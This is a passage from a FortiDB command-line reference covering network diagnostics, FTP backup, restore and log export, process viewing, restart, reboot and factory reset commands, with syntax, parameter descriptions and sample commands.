Syntax: execute ping {<ip> | <hostname>}
Execute Traceroute
The execute traceroute command allows you to test the connection between the FortiDB system and another network device, and display information about the network hops between the device and the FortiDB system.
Syntax: execute traceroute {<address_ipv4> | <host-name>}
Enter the following command to copy the backup configuration settings and restore the file on the FortiDB unit:
execute restore all-settings <ftp server> <filepath> <username> <password> [crptpasswd]
Note: This operation will replace your current settings and necessitate a reboot.
where:
<before-date> Date of the last archive you want included in your backup. The format is YYYY-MM-DD (MM(1-12), DD(1-31)); YYYY is a 4-digit number representing the year.
<ftp server> IP address or hostname of the FTP server.
<username> User name of the account that logs on to the FTP server.
<password> Password of the account that logs on to the FTP server.
[directory] Location on the FTP server where you want the tar file to be placed.
[filename] Name for the tar file on the FTP server where you want the archives to be placed. The default file name is FD-ARCHIVE-<before-date>.tar.
Sample command: execute backup-remove fd-archive 2008-07-30 <your_ftp_server> <your_ftp_username> <your_ftp_password> . myArchives.tar
where:
<before-date> Date of the reports you want included in your backup. The format is YYYY-MM-DD (MM(1-12), DD(1-31)); YYYY is a 4-digit number representing the year.
<ftp server> IP address or hostname of the FTP server.
<username> User name of the account that logs on to the FTP server.
<password> Password of the account that logs on to the FTP server.
[directory] Location on the FTP server where you want the tar file to be placed.
[filename] Name for the tar file on the FTP server where you want the reports to be placed. The default file name is FD-REPORT-<before-date>.tar.
Sample command: execute backup-remove fd-report 2008-07-30 <your_ftp_server> <your_ftp_username> <your_ftp_password> . myReports.tar
Diagnose Command
Diagnose commands display diagnostic information that helps you to troubleshoot problems.
diagnose system export: this FortiDB CLI command allows you to export diagnostic information to an FTP server.
Syntax: diagnose system export fd_log <ftp server> <user> <password> [directory] [filename]
where:
<ftp server> IP address or hostname of the FTP server
<username> User name of the account that logs on to the FTP server
<password> Password of the account that logs on to the FTP server
[directory] Location on the FTP server where you want the diagnostic file to be placed
[filename] Name of the zip file, containing several log files, that will be put on the FTP server. If you don't specify a filename, you get a default file called fortidb.zip.
Sample command: diagnose system export fd_log <your_ftp_server> <your_ftp_username> <your_ftp_password> . myDiagnose.zip
Execute Top
The execute top command allows you to view the processes running on the FortiDB system. Syntax: execute top
To exit the display, type q. Other interactive commands are available while running top; for help on them, type h.
Execute Restart
This FortiDB CLI command allows you to shut down and restart the application server under which FortiDB is running. Syntax: execute restart appserver
Execute Reboot
The execute reboot command allows you to restart the FortiDB system. This command will disconnect all sessions on the FortiDB system. Syntax: execute reboot
Execute Reset
The execute reset command allows you to reset the FortiDB system to factory defaults. This command will disconnect all sessions and restart the FortiDB system. Syntax: execute reset {admin-password | all-settings | data} where:
admin-password: reset the admin password to the default password
all-settings: reset all settings
data: reset the database
Questions
Thank you